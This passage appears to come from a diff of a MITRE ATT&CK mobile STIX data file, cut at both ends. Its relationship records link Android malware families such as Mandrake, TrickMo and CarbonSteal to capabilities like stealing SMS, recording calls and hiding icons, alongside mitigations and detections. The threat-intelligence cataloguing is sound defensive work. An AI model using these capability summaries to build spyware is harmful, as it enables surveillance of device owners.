Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:28:32.568Z", + "description": "[Xbot](https://attack.mitre.org/software/S0298) steals all SMS message and contact information as well as intercepts and parses certain SMS messages.(Citation: PaloAlto-Xbot)", + "relationship_type": "uses", + "source_ref": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--44a673c9-7ce7-42a0-8ab4-60bbb5001ce2", + "created": "2023-03-20T18:53:15.929Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:53:15.929Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--94bf07c4-3bf0-4ecc-8043-644e59fb9ec4", + "created": "2022-03-28T19:30:27.364Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates may contain patches to integrity 
checking mechanisms that can detect unauthorized hardware modifications.", + "modified": "2022-03-28T19:30:27.364Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--c08366bb-8d11-4921-853f-f0a3b6a2a1da", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7b45e72f-5741-4942-aa28-ee7abb6f7046", + "created": "2022-04-05T17:14:35.469Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T17:14:35.469Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--740ea19e-d248-44e5-a0e5-3e9420df9dc8", + "type": "relationship", + "created": "2020-04-24T17:46:31.613Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." 
+ } + ], + "modified": "2020-04-24T17:46:31.613Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can inject input to set itself as the default SMS handler, and to automatically click through pop-ups without giving the user any time to react.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ddca1254-b404-4850-9566-0be35c6d7564", + "created": "2020-11-10T17:08:35.771Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:00:11.412Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) can access the device’s SMS and MMS messages.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4ab1867c-b924-4b0d-a332-c0e150a28d7d", + "created": "2023-03-16T18:28:40.419Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:28:40.419Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--02b5cb07-9eb5-4e47-a4df-9c3985ad70fc", + "created": "2021-10-01T14:42:49.174Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. 
Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:26:41.762Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can abuse existing root access to copy components into the system partition.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9fa03a70-ad00-4148-ae5e-8315f3e618d2", + "created": "2020-07-15T20:20:59.375Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. 
Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:29:29.307Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can abuse device administrator permissions to ensure that it cannot be uninstalled until its permissions are revoked.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5a277966-4559-487e-bdfb-7be6366ccdb6", + "type": "relationship", + "created": "2019-09-03T19:45:48.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." 
+ } + ], + "modified": "2019-09-11T13:25:19.114Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) Two can take pictures with the device cameras.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cda58372-ae70-4716-8baf-cc06cb884ad6", + "type": "relationship", + "created": "2020-12-24T22:04:28.015Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T22:04:28.015Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has collected a list of installed application names.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9d4c1d68-3cc8-4cf9-b3ee-1525d0ce32de", + "type": "relationship", + "created": "2019-10-14T20:49:24.571Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "source_name": "securelist rotexy 2018" + } + ], + "modified": "2019-10-14T20:49:24.571Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) collects information about running processes.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a63bafb6-6647-410f-8673-a53ef2dee5e2", + "created": "2020-07-27T14:14:57.020Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Security Zen", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . 
Retrieved July 27, 2020.", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:52:46.975Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) can modify the SELinux enforcement mode.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a81431c4-ac34-4b63-9647-eb7c8e529e03", + "created": "2020-12-24T21:45:56.962Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:14:46.472Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can access call logs.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cf26d49c-1d1b-4861-9d6e-959f4f15b73a", + "type": "relationship", + "created": "2019-08-09T17:53:48.716Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. 
Retrieved December 22, 2016.", + "source_name": "TrendMicro-RCSAndroid" + } + ], + "modified": "2019-08-09T17:53:48.716Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can capture photos using the front and back cameras.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cd8c383a-2a62-45e5-917f-a26efe5ba03c", + "created": "2023-03-20T18:51:29.814Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:51:29.814Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--576dfa89-d400-4cac-b32d-8ee85a9de5d7", + "created": "2023-03-20T18:57:42.922Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:57:42.922Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 
"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c574251b-93ad-4f55-8b84-2700dfab4622", + "created": "2020-07-15T20:20:59.280Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:45:27.443Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can hide its icon on older Android versions.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--db1201f0-f925-4c3c-8673-7524a8c20886", + "type": "relationship", + "created": "2021-02-17T20:43:52.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." 
+ } + ], + "modified": "2021-02-17T20:43:52.274Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has recorded calls.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--024f9ee4-cb7d-49f4-b180-ad1e5e168a4c", + "created": "2017-10-25T14:48:53.747Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 7 and later iOS versions introduced changes that prevent applications from performing Process Discovery without elevated privileges. ", + "modified": "2022-03-30T20:32:46.334Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3230c032-17e0-49f7-b948-c157049aafe2", + "created": "2017-10-25T14:48:53.742Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should ensure bootloaders are locked to prevent arbitrary operating system code from being flashed onto the device.", + "modified": "2022-04-01T15:34:50.556Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--18a6020d-8fea-4a6e-84ab-a18343f2acea", + "created": "2022-04-06T13:40:14.515Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android 10 Privacy Changes", + "url": "https://developer.android.com/about/versions/10/privacy/changes#clipboard-data", + "description": "Android Developers. (n.d.). Privacy changes in Android 10. Retrieved September 11, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 10 prevents applications from accessing clipboard data unless the application is on the foreground or is set as the device’s default input method editor (IME).(Citation: Android 10 Privacy Changes)", + "modified": "2022-04-06T13:40:14.515Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b477afcb-7449-4fae-b4aa-c512c22d7500", + "type": "relationship", + "created": "2020-09-15T15:18:12.394Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. 
(2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-09-15T15:18:12.394Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can send SMS messages.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--327d0102-2113-4e12-be68-504db097a6fd", + "created": "2019-08-07T15:57:13.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019.", + "url": "https://securelist.com/mobile-banker-riltok/91374/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:01:31.230Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) communicates with the command and control server using HTTP requests.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--087609b6-cc6c-402f-ada9-00dbcbfecbe8", + "created": "2022-04-01T15:16:02.324Z", + "x_mitre_version": "0.1", + 
"external_references": [ + { + "source_name": "iOS Universal Links", + "url": "https://developer.apple.com/ios/universal-links/", + "description": "Apple. (n.d.). Universal Links for Developers. Retrieved September 11, 2020." + }, + { + "source_name": "Android App Links", + "url": "https://developer.android.com/training/app-links/verify-site-associations", + "description": "Google. (n.d.). Verify Android App Links. Retrieved September 11, 2020." + }, + { + "source_name": "IETF-PKCE", + "url": "https://tools.ietf.org/html/rfc7636", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Developers should use Android App Links(Citation: Android App Links) and iOS Universal Links(Citation: iOS Universal Links) to provide a secure binding between URIs and applications, preventing malicious applications from intercepting redirections. Additionally, for OAuth use cases, PKCE(Citation: IETF-PKCE) should be used to prevent use of stolen authorization codes. ", + "modified": "2022-04-01T15:16:02.324Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8ff45341-60d6-40d3-bb38-566814a466f9", + "created": "2020-07-20T13:27:33.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . 
Retrieved July 20, 2020.", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:51:31.121Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can perform primitive emulation checks.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b67f04d9-1cbd-49b4-9ec3-a33a41ac42ab", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-Obad", + "description": "Veo Zhang. (2013, June 13). Cybercriminals Improve Android Malware Stealth Routines with OBAD. 
Retrieved December 9, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[OBAD](https://attack.mitre.org/software/S0286) contains encrypted code along with an obfuscated decryption routine to make it difficult to analyze.(Citation: TrendMicro-Obad)", + "relationship_type": "uses", + "source_ref": "malware--ca4f63b9-a358-4214-bb26-8c912318cfde", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--40c9adb5-9d1a-4f51-8ef2-a80c2d78e4e4", + "created": "2022-04-05T19:38:41.538Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "If devices are enrolled using Apple User Enrollment or using a profile owner enrollment mode for Android, device controls prevent the enterprise from accessing the device’s physical location. This is typically used for a Bring Your Own Device (BYOD) deployment. 
